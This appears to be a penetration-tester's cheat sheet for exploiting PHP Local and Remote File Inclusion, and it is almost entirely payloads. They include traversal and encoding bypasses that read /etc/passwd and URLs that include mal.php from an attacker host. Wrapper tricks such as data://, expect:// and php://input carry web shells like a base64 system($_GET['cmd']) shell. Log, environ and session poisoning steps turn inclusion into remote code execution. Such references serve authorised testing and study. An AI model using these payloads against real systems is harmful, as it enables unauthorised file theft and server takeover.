File Inclusion
Remote File Inclusion (RFI): The file is loaded from a remote server (Best: You can write the code and the server will execute it). In php this is disabled by default (allow_url_include ).
Local File Inclusion (LFI): The sever loads a local file.
The vulnerability occurs when the user can control in some way the file that is going to be load by the server.
Vulnerable PHP functions : require, require_once, include, include_once
Blind - Interesting - LFI2RCE files
Copy wfuzz - c - w . / lfi2 . txt --hw 0 http : // 10.10 . 10 . 10 / nav . php?page = . . / . . / . . / . . / . . / . . / . . / FUZZ
Good wordlists for fuzzing
Basic LFI and Bypass Techniques
Copy http://example.com/index.php?page = . ./ . ./ . ./etc/passwd
#null byte
http://example.com/index.php?page = . ./ . ./ . ./etc/passwd%00
#encoding
http://example.com/index.php?page = .. %252f. . %252f. . %252fetc%252fpasswd
http://example.com/index.php?page = .. %c0%af. . %c0%af. . %c0%afetc%c0%afpasswd
http://example.com/index.php?page =%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page =%252e%252e%252fetc%252fpasswd%00
#filter bypass
http://example.com/index.php?page = ... .// ... .//etc/passwd
http://example.com/index.php?page = .... \/ .... \/ .... \/etc/passwd
http://example.com/index.php?page = . ./////// . .//// . .//////etc/passwd
http://example.com/index.php?page =/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
http://example.com/index.php?page =/var/www/ . ./ . ./etc/passwd #Maintain the initial path
Top 25 parameters
Here’s list of top 25 parameters that could be vulnerable to local file inclusion (LFI) vulnerabilities (from link ):
Copy ?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}
Basic RFI
Copy http : // example . com / index . php?page = http : // atacker . com / mal . php
http : // example . com / index . php?page = \ \attacker.com\shared\mal.php
LFI / RFI using PHP wrappers & protocols
php://filter
Copy # String Filters
## Chain string.toupper, string.rot13 and string.tolower reading /etc/passwd
echo file_get_contents ( "php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd" ) ;
## Same chain without the "|" char
echo file_get_contents ( "php://filter/string.toupper/string.rot13/string.tolower/resource=file:///etc/passwd" ) ;
## string.string_tags example
echo file_get_contents("php://filter/string.strip_tags/resource=data://text/plain,<b>Bold</b><?php php code; ?>lalalala");
# Conversion filter
## B64 decode
echo file_get_contents ( "php://filter/convert.base64-decode/resource=data://plain/text,aGVsbG8=" ) ;
## Chain B64 encode and decode
echo file_get_contents ( "php://filter/convert.base64-encode|convert.base64-decode/resource=file:///etc/passwd" ) ;
## convert.quoted-printable-encode example
echo file_get_contents ( "php://filter/convert.quoted-printable-encode/resource=data://plain/text,£hellooo=" ) ;
= C2 = A3hellooo = 3 D
## convert.iconv.utf-8.utf-16le
echo file_get_contents ( "php://filter/convert.iconv.utf-8.utf-16le/resource=data://plain/text,trololohellooo=" ) ;
# Compresion Filter
## Compress + B64
echo file_get_contents ( "php://filter/zlib.deflate/convert.base64-encode/resource=file:///etc/passwd" ) ;
readfile ( 'php://filter/zlib.inflate/resource=test.deflated' ) ; #To decompress the data locally
data://
Copy http://example.net/?page =data://text/plain,<?php echo base64_encode ( file_get_contents( "index.php" )); ?>
http://example.net/?page =data://text/plain,<?php phpinfo (); ?>
http://example.net/?page =data://text/plain; base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4 =
http://example.net/?page =data:text/plain,<?php echo base64_encode ( file_get_contents( "index.php" )); ?>
http://example.net/?page =data:text/plain,<?php phpinfo (); ?>
http://example.net/?page =data:text/plain; base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4 =
expect://
Copy http://example.com/index.php?page =expect://id
http://example.com/index.php?page =expect://ls
input://
Copy # Specify your payload in the POST parameters
http://example.com/index.php?page =php://input
POST DATA: < ?php system ( 'id' ); ?>
More protocols
file:// — Accessing local filesystem
ftp:// — Accessing FTP(s) URLs
php:// — Accessing various I/O streams
glob:// — Find pathnames matching pattern
LFI2RCE
Log injection
If the Apache or Nginx server is vulnerable to LFI and you're able to reach the log file, set the user agent or inside a GET parameter a php shell like <?php system($_GET['c']); ?>
and include that file. We do this in HTB box Vessel .
Default log paths:
Copy /var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log
Via /proc/self/environ
Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file
Copy GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: < ?=phpinfo (); ?>
Via PHP sessions
Check if the website use PHP Session (PHPSESSID)
Copy Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27 ; path = /
Set-Cookie: user=admin ; expires = Mon, 13-Aug-2018 20 :21:29 GMT ; path = / ; httponly
Sessions are stored in /var/lib/php5/sess_[PHPSESSID]
by default
Copy /var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip | s:0: "" ; loggedin | s:0: "" ; lang | s:9: "en_us.php" ; win_lin | s:0: "" ; user | s:6: "admin" ; pass | s:6: "admin" ;
Set the cookie to <?php system('cat /etc/passwd');?>
or in POST data:
Copy login = 1 & user =< ?php system( "cat /etc/passwd" ); ?>& pass = password & lang = en_us.php
Use the LFI to include the PHP session file
Copy login = 1 & user = admin & pass = password & lang = /../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8n
Last updated 6 months ago